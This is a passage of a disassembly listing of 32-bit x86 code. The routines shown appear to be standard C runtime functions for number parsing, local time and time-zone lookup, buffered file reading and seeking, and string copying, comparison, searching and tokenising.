jmp short loc_41699B
; ---------------------------------------------------------------------------
loc_416990: ; CODE XREF: sub_416878+10B�j
mov eax, ds:off_42F360
mov ax, [eax+esi*2]
and eax, edi
loc_41699B: ; CODE XREF: sub_416878+116�j
test eax, eax
jz short loc_4169E9
movsx eax, bl
push eax
call sub_41B729
pop ecx
mov ecx, eax
sub ecx, 37h
loc_4169AE: ; CODE XREF: sub_416878+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_4169E9
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_4169D3
jnz short loc_4169CD
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_4169D3
loc_4169CD: ; CODE XREF: sub_416878+147�j
or [ebp+arg_C], 4
jmp short loc_4169DC
; ---------------------------------------------------------------------------
loc_4169D3: ; CODE XREF: sub_416878+145�j
; sub_416878+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_4169DC: ; CODE XREF: sub_416878+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_41694D
; ---------------------------------------------------------------------------
loc_4169E9: ; CODE XREF: sub_416878+125�j
; sub_416878+139�j
mov ecx, [ebp+arg_C]
dec [ebp+var_4]
mov edx, [ebp+arg_4]
test cl, 8
jnz short loc_416A07
test edx, edx
jz short loc_416A01
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_416A01: ; CODE XREF: sub_416878+181�j
and [ebp+var_8], 0
jmp short loc_416A54
; ---------------------------------------------------------------------------
loc_416A07: ; CODE XREF: sub_416878+17D�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_416A2D
test cl, 1
jnz short loc_416A54
and ecx, 2
jz short loc_416A24
cmp [ebp+var_8], 80000000h
ja short loc_416A2D
loc_416A24: ; CODE XREF: sub_416878+1A1�j
test ecx, ecx
jnz short loc_416A54
cmp [ebp+var_8], eax
jbe short loc_416A54
loc_416A2D: ; CODE XREF: sub_416878+197�j
; sub_416878+1AA�j
test byte ptr [ebp+arg_C], 1
mov ds:dword_4C9084, 22h
jz short loc_416A43
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_416A54
; ---------------------------------------------------------------------------
loc_416A43: ; CODE XREF: sub_416878+1C3�j
mov ecx, [ebp+arg_C]
and cl, 2
neg cl
sbb ecx, ecx
neg ecx
add ecx, eax
mov [ebp+var_8], ecx
loc_416A54: ; CODE XREF: sub_416878+18D�j
; sub_416878+19C�j ...
test edx, edx
jz short loc_416A5D
mov eax, [ebp+var_4]
mov [edx], eax
loc_416A5D: ; CODE XREF: sub_416878+1DE�j
test byte ptr [ebp+arg_C], 2
jz short loc_416A6B
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_416A6B: ; CODE XREF: sub_416878+1E9�j
mov eax, [ebp+var_8]
jmp short loc_416A7B
; ---------------------------------------------------------------------------
loc_416A70: ; CODE XREF: sub_416878+66�j
; sub_416878+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_416A79
mov [eax], edi
loc_416A79: ; CODE XREF: sub_416878+1FD�j
xor eax, eax
loc_416A7B: ; CODE XREF: sub_416878+1F6�j
pop edi
pop esi
pop ebx
leave
retn
sub_416878 endp
; =============== S U B R O U T I N E =======================================
sub_416A80 proc near ; CODE XREF: sub_403A1B+4BD�p
; sub_40D2E0+3773�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_416878
add esp, 10h
retn
sub_416A80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416A97 proc near ; CODE XREF: sub_403A1B+266�p
; sub_403A1B+46A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_415C80
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_41B7F5
add esp, 10h
leave
retn
sub_416A97 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416ACB proc near ; CODE XREF: sub_403A1B+4E�p
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
call ds:dword_42205C ; GetLocalTime
lea eax, [ebp+var_20]
push eax
call ds:dword_422178 ; GetSystemTime
mov ax, [ebp+var_16]
cmp ax, ds:word_4C907A
jnz short loc_416B30
mov ax, [ebp+var_18]
cmp ax, ds:word_4C9078
jnz short loc_416B30
mov ax, [ebp+var_1A]
cmp ax, ds:word_4C9076
jnz short loc_416B30
mov ax, [ebp+var_1E]
cmp ax, ds:word_4C9072
jnz short loc_416B30
mov ax, [ebp+var_20]
cmp ax, ds:word_4C9070
jnz short loc_416B30
mov eax, ds:dword_4C9068
jmp short loc_416B75
; ---------------------------------------------------------------------------
loc_416B30: ; CODE XREF: sub_416ACB+28�j
; sub_416ACB+35�j ...
lea eax, [ebp+var_CC]
push eax
call ds:dword_422174 ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz short loc_416B5D
cmp eax, 2
jnz short loc_416B59
cmp [ebp+var_32], 0
jz short loc_416B59
cmp [ebp+var_24], 0
jz short loc_416B59
push 1
pop eax
jmp short loc_416B60
; ---------------------------------------------------------------------------
loc_416B59: ; CODE XREF: sub_416ACB+7A�j
; sub_416ACB+81�j ...
xor eax, eax
jmp short loc_416B60
; ---------------------------------------------------------------------------
loc_416B5D: ; CODE XREF: sub_416ACB+75�j
or eax, 0FFFFFFFFh
loc_416B60: ; CODE XREF: sub_416ACB+8C�j
; sub_416ACB+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_4C9070
movsd
movsd
movsd
movsd
pop edi
mov ds:dword_4C9068, eax
pop esi
loc_416B75: ; CODE XREF: sub_416ACB+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_41C2A6
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_416BA5
mov [ecx], eax
locret_416BA5: ; CODE XREF: sub_416ACB+D6�j
leave
retn
sub_416ACB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416BA7 proc near ; CODE XREF: sub_40409E+4E�p
; sub_40525F+30E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_416BCB
xor eax, eax
jmp loc_416C74
; ---------------------------------------------------------------------------
loc_416BCB: ; CODE XREF: sub_416BA7+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_416BDE
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_416BEA
; ---------------------------------------------------------------------------
loc_416BDE: ; CODE XREF: sub_416BA7+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_416BEA
; ---------------------------------------------------------------------------
loc_416BE7: ; CODE XREF: sub_416BA7+C4�j
mov ecx, [ebp+arg_0]
loc_416BEA: ; CODE XREF: sub_416BA7+35�j
; sub_416BA7+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_416C1C
mov eax, [esi+4]
test eax, eax
jz short loc_416C1C
cmp ecx, eax
mov edi, ecx
jb short loc_416C01
mov edi, eax
loc_416C01: ; CODE XREF: sub_416BA7+56�j
push edi
push dword ptr [esi]
push ebx
call sub_415560
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_416C67
; ---------------------------------------------------------------------------
loc_416C1C: ; CODE XREF: sub_416BA7+49�j
; sub_416BA7+50�j
cmp ecx, [ebp+arg_C]
jb short loc_416C4F
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_416C32
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_416C32: ; CODE XREF: sub_416BA7+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_41C441
add esp, 0Ch
test eax, eax
jz short loc_416C79
cmp eax, 0FFFFFFFFh
jz short loc_416C7F
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_416C67
; ---------------------------------------------------------------------------
loc_416C4F: ; CODE XREF: sub_416BA7+78�j
push esi
call sub_41C368
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_416C83
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_416C67: ; CODE XREF: sub_416BA7+73�j
; sub_416BA7+A6�j
cmp [ebp+arg_0], 0
jnz loc_416BE7
mov eax, [ebp+arg_8]
loc_416C74: ; CODE XREF: sub_416BA7+1F�j
; sub_416BA7+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416C79: ; CODE XREF: sub_416BA7+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_416C83
; ---------------------------------------------------------------------------
loc_416C7F: ; CODE XREF: sub_416BA7+9F�j
or dword ptr [esi+0Ch], 20h
loc_416C83: ; CODE XREF: sub_416BA7+B2�j
; sub_416BA7+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_416C74
sub_416BA7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416C8F proc near ; CODE XREF: sub_404138+2B2�p
; sub_404716+101�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_416CA8: ; CODE XREF: sub_416C8F+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_416CA8
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_416CD0
mov edx, ds:dword_4C9080
loc_416CD0: ; CODE XREF: sub_416C8F+39�j
; sub_416C8F+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_416CF0
test al, al
jz short loc_416CF0
inc edx
jmp short loc_416CD0
; ---------------------------------------------------------------------------
loc_416CF0: ; CODE XREF: sub_416C8F+58�j
; sub_416C8F+5C�j
mov ebx, edx
loc_416CF2: ; CODE XREF: sub_416C8F+81�j
mov al, [edx]
test al, al
jz short loc_416D16
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_416D12
inc edx
jmp short loc_416CF2
; ---------------------------------------------------------------------------
loc_416D12: ; CODE XREF: sub_416C8F+7E�j
and byte ptr [edx], 0
inc edx
loc_416D16: ; CODE XREF: sub_416C8F+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov ds:dword_4C9080, edx
and eax, ebx
pop ebx
leave
retn
sub_416C8F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416D30 proc near ; CODE XREF: sub_4049CD+1B6�p
; sub_405898+6E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_416DB3
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_416D54
shr ecx, 2
jnz short loc_416DC1
jmp short loc_416D75
; ---------------------------------------------------------------------------
loc_416D54: ; CODE XREF: sub_416D30+1B�j
; sub_416D30+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_416D82
test al, al
jz short loc_416D8A
test esi, 3
jnz short loc_416D54
mov ebx, ecx
shr ecx, 2
jnz short loc_416DC1
loc_416D70: ; CODE XREF: sub_416D30+8F�j
and ebx, 3
jz short loc_416D82
loc_416D75: ; CODE XREF: sub_416D30+22�j
; sub_416D30+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_416DAE
dec ebx
jnz short loc_416D75
loc_416D82: ; CODE XREF: sub_416D30+2B�j
; sub_416D30+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_416D8A: ; CODE XREF: sub_416D30+2F�j
test edi, 3
jz short loc_416DA4
loc_416D92: ; CODE XREF: sub_416D30+72�j
mov [edi], al
inc edi
dec ecx
jz loc_416E26
test edi, 3
jnz short loc_416D92
loc_416DA4: ; CODE XREF: sub_416D30+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_416E17
loc_416DAB: ; CODE XREF: sub_416D30+7F�j
; sub_416D30+F4�j
mov [edi], al
inc edi
loc_416DAE: ; CODE XREF: sub_416D30+4D�j
dec ebx
jnz short loc_416DAB
pop ebx
pop esi
loc_416DB3: ; CODE XREF: sub_416D30+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_416DB9: ; CODE XREF: sub_416D30+A9�j
; sub_416D30+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_416D70
loc_416DC1: ; CODE XREF: sub_416D30+20�j
; sub_416D30+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_416DB9
test dl, dl
jz short loc_416E0B
test dh, dh
jz short loc_416E01
test edx, 0FF0000h
jz short loc_416DF7
test edx, 0FF000000h
jnz short loc_416DB9
mov [edi], edx
jmp short loc_416E0F
; ---------------------------------------------------------------------------
loc_416DF7: ; CODE XREF: sub_416D30+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_416E0F
; ---------------------------------------------------------------------------
loc_416E01: ; CODE XREF: sub_416D30+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_416E0F
; ---------------------------------------------------------------------------
loc_416E0B: ; CODE XREF: sub_416D30+AD�j
xor edx, edx
mov [edi], edx
loc_416E0F: ; CODE XREF: sub_416D30+C5�j
; sub_416D30+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_416E21
loc_416E17: ; CODE XREF: sub_416D30+79�j
xor eax, eax
loc_416E19: ; CODE XREF: sub_416D30+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_416E19
loc_416E21: ; CODE XREF: sub_416D30+E5�j
and ebx, 3
jnz short loc_416DAB
loc_416E26: ; CODE XREF: sub_416D30+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_416D30 endp
; =============== S U B R O U T I N E =======================================
sub_416E2E proc near ; CODE XREF: sub_40525F+2E2�p
; sub_40525F+435�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_416EAA
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_416E4D
cmp edi, 1
jz short loc_416E4D
cmp edi, 2
jnz short loc_416EAA
loc_416E4D: ; CODE XREF: sub_416E2E+13�j
; sub_416E2E+18�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_416E64
push esi
call sub_41C6D1
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_416E64: ; CODE XREF: sub_416E2E+27�j
push esi
call sub_4188F0
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_416E79
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_416E8D
; ---------------------------------------------------------------------------
loc_416E79: ; CODE XREF: sub_416E2E+42�j
test al, 1
jz short loc_416E8D
test al, 8
jz short loc_416E8D
test ah, 4
jnz short loc_416E8D
mov dword ptr [esi+18h], 200h
loc_416E8D: ; CODE XREF: sub_416E2E+49�j
; sub_416E2E+4D�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_41C637
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_416EB7
; ---------------------------------------------------------------------------
loc_416EAA: ; CODE XREF: sub_416E2E+B�j
; sub_416E2E+1D�j
mov ds:dword_4C9084, 16h
or eax, 0FFFFFFFFh
loc_416EB7: ; CODE XREF: sub_416E2E+7A�j
pop edi
pop esi
retn
sub_416E2E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EC0 proc near ; CODE XREF: sub_40525F+2AC�p
; sub_40525F+2CD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_416EF1
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_416EEF
jz short loc_416EF1
dec ecx
dec ecx
loc_416EEF: ; CODE XREF: sub_416EC0+29�j
not ecx
loc_416EF1: ; CODE XREF: sub_416EC0+9�j
; sub_416EC0+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_416EC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416F00 proc near ; CODE XREF: sub_405756+5C�p
; sub_405756+9C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_416FB4
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_416F2A
loc_416F1B: ; CODE XREF: sub_416F00+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_416F5B
test edi, 3
jnz short loc_416F1B
loc_416F2A: ; CODE XREF: sub_416F00+19�j
; sub_416F00+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_416F2A
mov eax, [edi-4]
test al, al
jz short loc_416F68
test ah, ah
jz short loc_416F63
test eax, 0FF0000h
jz short loc_416F5E
test eax, 0FF000000h
jnz short loc_416F2A
loc_416F5B: ; CODE XREF: sub_416F00+20�j
dec edi
jmp short loc_416F6B
; ---------------------------------------------------------------------------
loc_416F5E: ; CODE XREF: sub_416F00+52�j
sub edi, 2
jmp short loc_416F6B
; ---------------------------------------------------------------------------
loc_416F63: ; CODE XREF: sub_416F00+4B�j
sub edi, 3
jmp short loc_416F6B
; ---------------------------------------------------------------------------
loc_416F68: ; CODE XREF: sub_416F00+47�j
sub edi, 4
loc_416F6B: ; CODE XREF: sub_416F00+5C�j
; sub_416F00+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_416F80
mov ebx, ecx
shr ecx, 2
jnz short loc_416FCC
jmp short loc_416F9C
; ---------------------------------------------------------------------------
loc_416F80: ; CODE XREF: sub_416F00+75�j
; sub_416F00+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_416FBA
mov [edi], dl
inc edi
dec ecx
jz short loc_416FB0
test esi, 3
jnz short loc_416F80
mov ebx, ecx
shr ecx, 2
jnz short loc_416FCC
loc_416F9C: ; CODE XREF: sub_416F00+7E�j
; sub_416F00+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_416FB0
loc_416FA3: ; CODE XREF: sub_416F00+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_416FB2
dec ecx
jnz short loc_416FA3
loc_416FB0: ; CODE XREF: sub_416F00+8B�j
; sub_416F00+A1�j
mov [edi], cl
loc_416FB2: ; CODE XREF: sub_416F00+AB�j
pop ebx
pop esi
loc_416FB4: ; CODE XREF: sub_416F00+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_416FBA: ; CODE XREF: sub_416F00+85�j
; sub_416F00+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_416FC4: ; CODE XREF: sub_416F00+E4�j
; sub_416F00+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_416F9C
loc_416FCC: ; CODE XREF: sub_416F00+7C�j
; sub_416F00+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_416FC4
test dl, dl
jz short loc_416FBA
test dh, dh
jz short loc_417018
test edx, 0FF0000h
jz short loc_417008
test edx, 0FF000000h
jnz short loc_416FC4
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_417008: ; CODE XREF: sub_416F00+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_417018: ; CODE XREF: sub_416F00+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_416F00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417030 proc near ; CODE XREF: sub_405898+2A2�p
; sub_40D2E0+31DB�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_417051
xor eax, eax
jmp short loc_417053
; ---------------------------------------------------------------------------
loc_417051: ; CODE XREF: sub_417030+1B�j
mov eax, edi
loc_417053: ; CODE XREF: sub_417030+1F�j
cld
pop edi
leave
retn
sub_417030 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_417070
loc_417060: ; CODE XREF: sub_417070+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_417070
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417070 proc near ; CODE XREF: sub_40726C+DB�p
; sub_40BF5E+32�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00417060 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_417076: ; CODE XREF: sub_415A50+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_41709B
loc_417088: ; CODE XREF: sub_417070+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_417060
test cl, cl
jz short loc_4170E4
test edx, 3
jnz short loc_417088
loc_41709B: ; CODE XREF: sub_417070+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4170A6: ; CODE XREF: sub_417070+61�j
; sub_417070+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_4170E8
and eax, 81010100h
jz short loc_4170A6
and eax, 1010100h
jnz short loc_4170E2
and esi, 80000000h
jnz short loc_4170A6
loc_4170E2: ; CODE XREF: sub_417070+68�j
; sub_417070+81�j ...
pop esi
pop edi
loc_4170E4: ; CODE XREF: sub_417070+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4170E8: ; CODE XREF: sub_417070+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_417125
test al, al
jz short loc_4170E2
cmp ah, bl
jz short loc_41711E
test ah, ah
jz short loc_4170E2
shr eax, 10h
cmp al, bl
jz short loc_417117
test al, al
jz short loc_4170E2
cmp ah, bl
jz short loc_417110
test ah, ah
jz short loc_4170E2
jmp short loc_4170A6
; ---------------------------------------------------------------------------
loc_417110: ; CODE XREF: sub_417070+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_417117: ; CODE XREF: sub_417070+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41711E: ; CODE XREF: sub_417070+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_417125: ; CODE XREF: sub_417070+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_417070 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41712C proc near ; CODE XREF: sub_40726C+AF�p
; sub_40D2E0+47F2�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_417140
xor eax, eax
jmp short loc_417176
; ---------------------------------------------------------------------------
loc_417140: ; CODE XREF: sub_41712C+E�j
dec [ebp+arg_4]
push esi
jz short loc_417170
mov esi, [ebp+arg_8]
loc_417149: ; CODE XREF: sub_41712C+42�j
dec dword ptr [esi+4]
js short loc_417158
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_41715F
; ---------------------------------------------------------------------------
loc_417158: ; CODE XREF: sub_41712C+20�j
push esi
call sub_41C368
pop ecx
loc_41715F: ; CODE XREF: sub_41712C+2A�j
cmp eax, 0FFFFFFFFh
jz short loc_41717A
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_417170
dec [ebp+arg_4]
jnz short loc_417149
loc_417170: ; CODE XREF: sub_41712C+18�j
; sub_41712C+3D�j ...
and byte ptr [edi], 0
loc_417173: ; CODE XREF: sub_41712C+55�j
mov eax, ebx
pop esi
loc_417176: ; CODE XREF: sub_41712C+12�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41717A: ; CODE XREF: sub_41712C+36�j
cmp edi, [ebp+arg_0]
jnz short loc_417170
xor ebx, ebx
jmp short loc_417173
sub_41712C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417183 proc near ; CODE XREF: sub_40784F+BF�p
; sub_40784F+12C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4C911C
push ebx
xor ebx, ebx
cmp eax, ebx
mov [ebp+var_4], ebx
jnz short loc_4171B7
mov eax, [ebp+arg_0]
mov edx, eax
cmp [eax], bl
jz short loc_41721E
loc_41719F: ; CODE XREF: sub_417183+30�j
mov cl, [edx]
cmp cl, 61h
jl short loc_4171B0
cmp cl, 7Ah
jg short loc_4171B0
sub cl, 20h
mov [edx], cl
loc_4171B0: ; CODE XREF: sub_417183+21�j
; sub_417183+26�j
inc edx
cmp [edx], bl
jnz short loc_41719F
jmp short loc_41721E
; ---------------------------------------------------------------------------
loc_4171B7: ; CODE XREF: sub_417183+11�j
push esi
push edi
push 1
push ebx
push ebx
push ebx
push 0FFFFFFFFh
mov esi, 200h
push [ebp+arg_0]
push esi
push eax
call sub_41C829
mov edi, eax
add esp, 20h
cmp edi, ebx
jz short loc_417210
push edi
call sub_415D2F
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_417210
push 1
push ebx
push edi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push ds:dword_4C911C
call sub_41C829
add esp, 20h
test eax, eax
jz short loc_417210
push [ebp+var_4]
push [ebp+arg_0]
call sub_415B90
pop ecx
pop ecx
loc_417210: ; CODE XREF: sub_417183+53�j
; sub_417183+61�j ...
push [ebp+var_4]
call sub_415DE1
mov eax, [ebp+arg_0]
pop ecx
pop edi
pop esi
